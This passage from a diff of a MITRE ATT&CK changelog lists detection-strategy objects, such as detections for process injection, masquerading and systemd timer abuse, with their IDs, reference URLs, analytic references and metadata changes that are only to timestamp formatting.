+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.675000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0127",
+                            "external_id": "DET0127"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Behavioral Detection of Masquerading Across Platforms via Metadata and Execution Discrepancy",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--e3d982ec-2729-4e98-b340-affa13096fd6",
+                        "x-mitre-analytic--3191336e-8cdb-4d41-80a4-aa2ab869f7bf",
+                        "x-mitre-analytic--7ebea786-db9c-439d-9caf-d0dd740047f3",
+                        "x-mitre-analytic--6927a2ad-c56f-4e87-9392-6e3eef07e57e",
+                        "x-mitre-analytic--f3dfb562-94ef-44ea-be4f-17ac2d0771b5"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.675000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--36654ec6-5019-4e79-b299-1fbf3a03e064",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.674000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0529",
+                            "external_id": "DET0529"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Behavioral Detection of Native API Invocation via Unusual DLL Loads and Direct Syscalls",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--2a23296d-70f2-4e04-9a97-62d093ad1765",
+                        "x-mitre-analytic--552ff82d-467b-4aeb-a4c3-084ca24dbd3e",
+                        "x-mitre-analytic--5e02fe2a-7659-4871-b79e-7ea57373aa37"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.674000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--45ac24cf-b8f4-44d5-97e1-3efe2bf28abc",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.676000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0049",
+                            "external_id": "DET0049"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Behavioral Detection of Network History and Configuration Tampering",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--d71c4839-8d23-41f4-b59a-8bd2c3517d1e",
+                        "x-mitre-analytic--0bd02555-3b54-4425-84c8-118b95857df1",
+                        "x-mitre-analytic--d01951d8-aae8-48b6-afd3-68c86fc167b1",
+                        "x-mitre-analytic--5258feec-def7-43e0-bbe9-459ba53d3e28"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.676000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--00060b87-7f99-45aa-9553-a4d94139195c",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.667000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0103",
+                            "external_id": "DET0103"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Behavioral Detection of Network Share Connection Removal via CLI and SMB Disconnects",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--5d47e6b2-04fb-45ab-be98-7de1baabf508"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.667000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--e3758cbb-5dd9-4aad-b848-0539a8c56307",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.695000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0378",
+                            "external_id": "DET0378"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Behavioral Detection of Obfuscated Files or Information",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--1dee558e-720e-4f3b-9414-192a63eb8909",
+                        "x-mitre-analytic--3e7ff1f9-57e2-44f4-8dc1-20d1a1652f73",
+                        "x-mitre-analytic--1c2e527f-b9ff-4e1d-896d-0c1257f0abc1",
+                        "x-mitre-analytic--97a188cf-5851-4cb7-9bb5-17702707d52b",
+                        "x-mitre-analytic--f1ec63bc-294c-471c-ae9f-4dd70f3c036a"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.695000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--65c18137-cad3-4fd3-8b24-22a61850c8a1",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.679000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0106",
+                            "external_id": "DET0106"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Behavioral Detection of PE Injection via Remote Memory Mapping",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--d845dc30-6950-4f0c-9342-29b7a7315bd2"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.679000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--685546e7-2ec3-4bfa-9109-86df9fb196ee",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.680000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0179",
+                            "external_id": "DET0179"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Behavioral Detection of Permission Groups Discovery",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--d14cc347-9e27-479d-8347-1a5950cdd70c",
+                        "x-mitre-analytic--56a17328-c6b0-4e3d-9404-d4b8ba967a14",
+                        "x-mitre-analytic--ef8fa56d-882e-42da-990e-2adc3a771041"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.680000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--9833b57b-4c83-4f58-b4cf-76f041b29273",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.685000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0508",
+                            "external_id": "DET0508"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Behavioral Detection of Process Injection Across Platforms",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--337976cc-5fd5-49e8-abcb-79f27d19382c",
+                        "x-mitre-analytic--61282e0a-3eae-4358-8821-6c8318961e24",
+                        "x-mitre-analytic--5439d083-91d6-4369-9406-8cfb2cf5cbde"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.685000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--16495e17-03ec-4e11-ab80-f76ed6386329",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.670000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0002",
+                            "external_id": "DET0002"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Behavioral Detection of Publish/Subscribe Protocol Misuse for C2",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--ee4e3e61-e138-498b-93bf-3a5f8fea691c",
+                        "x-mitre-analytic--3ecc4ba2-bf4f-481c-b813-69c169c28c83",
+                        "x-mitre-analytic--131d3f89-e10d-4ac9-a9d0-fcb4e8e8760a",
+                        "x-mitre-analytic--748f457a-5dfa-431b-b5a0-3d5e1d56ebbb"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.670000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--f6e514c0-120a-4ab1-ae3d-aa2de14e4324",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.698000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0008",
+                            "external_id": "DET0008"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Behavioral Detection of Remote Cloud Logins via Valid Accounts",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--7d4732f8-989c-4425-81c4-aa3e1bcb8d0e",
+                        "x-mitre-analytic--ecb9db5c-55ef-48df-8ccb-f57db8c32a08",
+                        "x-mitre-analytic--c85d0aea-06c4-4b0f-8552-0d0873394ffa",
+                        "x-mitre-analytic--fb23f9ee-cdc8-46be-8f40-3631afbaff5a"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.698000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--5367273a-2f30-413e-a961-1dbd323be5b0",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.677000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0596",
+                            "external_id": "DET0596"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Behavioral Detection of Remote SSH Logins Followed by Post-Login Execution",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--bcc6bec5-63c7-4084-9d2f-da8b58d0f621",
+                        "x-mitre-analytic--9c8ba5cd-40db-4214-8db1-b03b2d7b1690",
+                        "x-mitre-analytic--1b6eaec8-141f-44f8-ae1f-387c44635c38"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.677000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--909c86ca-ddd0-4e96-8464-39f5f80ef20e",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.684000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0521",
+                            "external_id": "DET0521"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Behavioral Detection of Spoofed GUI Credential Prompts",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--ea127140-2f66-4c3d-93ab-215c210ad6c5",
+                        "x-mitre-analytic--c4ff3b74-bba1-4129-b246-50213e77336d",
+                        "x-mitre-analytic--3b327a8f-0ea3-4848-b34a-58029e5edf57"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.684000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--172cff54-a89b-4207-abc2-8d0c9601025e",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.670000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0195",
+                            "external_id": "DET0195"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Behavioral Detection of System Network Configuration Discovery",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--edfec58e-e591-4057-a906-1baf3674d80b",
+                        "x-mitre-analytic--6a57daad-9d2c-4851-a46e-b6ebac607a4c",
+                        "x-mitre-analytic--79c196d7-abb8-4766-a875-4acafc6f059d",
+                        "x-mitre-analytic--cb70ad2f-7c96-4669-baed-3007246b0630",
+                        "x-mitre-analytic--e7debe02-4326-48ae-aa22-59c2a847d3e7"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.670000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--7578b2e3-2b9c-491d-9157-699a4bd6a136",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.681000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0231",
+                            "external_id": "DET0231"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Behavioral Detection of Systemd Timer Abuse for Scheduled Execution",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--a80f58c9-deb2-45ed-a8fb-4f3df5082874"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.681000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--8103189e-83c8-4246-a56c-193e19c98182",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.683000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0518",
+                            "external_id": "DET0518"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Behavioral Detection of T1498 \u2013 Network Denial of Service Across Platforms",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--0eff49de-834e-42d3-9a7a-3ac032aa9836",
+                        "x-mitre-analytic--1578f892-0644-4974-bf55-9abb802612fa"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.683000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--47dd679b-1bd4-4bb7-a946-5d77fd49a939",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.676000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0295",
+                            "external_id": "DET0295"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Behavioral Detection of Thread Execution Hijacking via Thread Suspension and Context Switching",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--26ef9aef-33eb-4df2-ba82-6ace95173c80"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.676000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--bb431f45-c3fe-4b98-8dd7-70346b56c880",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.690000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0178",
+                            "external_id": "DET0178"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Behavioral Detection of Unauthorized VNC Remote Control Sessions",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--7c91d6c7-4591-41b1-9c08-0c0660b07d24",
+                        "x-mitre-analytic--9032a591-de05-44c2-b1f6-3d711f417cce",
+                        "x-mitre-analytic--b88251d3-6406-4512-a55f-a6bc3493e2ad"
+                    ],
